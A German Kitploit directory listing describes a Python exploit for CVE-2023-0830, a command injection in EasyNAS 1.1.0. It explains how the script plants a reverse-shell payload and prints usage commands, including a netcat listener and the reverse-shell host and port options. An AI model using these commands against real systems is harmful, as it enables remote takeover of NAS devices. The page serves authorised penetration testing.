Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-0830 — Exploit für EasyNAS Version 1.1.0. Die ausgenutzte Schwachstelle ist eine Befehlseinschleusungslücke, die eine Authentifizierung erfordert. | Kitploit
Tools/GitHubGitHub/xbz0n/cve-2023-0830
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubxbz0n/cve-2023-0830

CVE-2023-0830

Exploit für EasyNAS Version 1.1.0. Die ausgenutzte Schwachstelle ist eine Befehlseinschleusungslücke, die eine Authentifizierung erfordert.

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-0830: EasyNAS 1.1.0 – Authentifizierter OS-Befehlseinschleusungs-Exploit

Dieses Python-Skript ist ein leistungsstarker Exploit für EasyNAS Version 1.1.0 mit erweiterter Funktionalität, einschließlich eines integrierten Listeners. Die ausgenutzte Schwachstelle ist ein Befehlseinschleusungsfehler, der eine Authentifizierung erfordert.

Das Skript stellt eine Sitzung mit dem Zielserver her und sendet dann eine Anmeldeanforderung mit vom Benutzer bereitgestellten Anmeldeinformationen. Nach erfolgreicher Authentifizierung erstellt das Skript eine Nutzlast, die bei Ausführung eine Reverse-Shell-Verbindung zu einer vom Benutzer angegebenen IP und einem Port öffnet. Diese Nutzlast wird URL- und Base64-kodiert und dann über eine präparierte GET-Anfrage in die Datei backup.pl auf dem Server injiziert.

CVE: CVE-2023-0830

Autor des Exploits

Ivan Spiridonov (xbz0n) https://xbz0n.sh

Hersteller-Webseite

https://www.easynas.org

Funktionen

  • Integrierter Reverse-Shell-Listener – kein separater Netcat-Prozess erforderlich
  • Automatische IP-Adresserkennung für den Listener
  • Option zur Verwendung verschiedener Shell-Typen (bash, sh, python)
  • Unterstützung für HTTP und HTTPS
  • Unterstützung für externe Listener

Verwendung

Grundlegende Verwendung mit integriertem Listener (empfohlen):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin

Verwendung eines externen Listeners (zuerst nc -lvnp 4444 starten):

root@kitploit:~
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444

Optionen:

root@kitploit:~
--mode {shell,reverse}    Exploit-Modus: shell (integrierte Reverse-Shell) oder reverse (externer Listener)
--lhost IP_ADDRESS        IP-Adresse für den Reverse-Shell-Listener (standardmäßig automatisch erkannt)
--lport PORT              Port für den Reverse-Shell-Listener (Standard: 4444)
--protocol {http,https}   Zu verwendendes Protokoll (Standard: https)
--verbose                 Ausführliche Ausgabe aktivieren
--shell {bash,sh,python}  Shell-Typ für integrierten Listener angeben (Standard: bash)

Abhängigkeiten

  • Python 3
  • Requests-Bibliothek

Haftungsausschluss

Dieses Skript dient nur zu Bildungszwecken und für autorisierte Penetrationstests. Holen Sie immer die ausdrückliche Erlaubnis ein, bevor Sie Penetrationstests gegen ein Netzwerk oder System durchführen.

Bitte verwenden Sie es verantwortungsvoll.

Tool herunterladen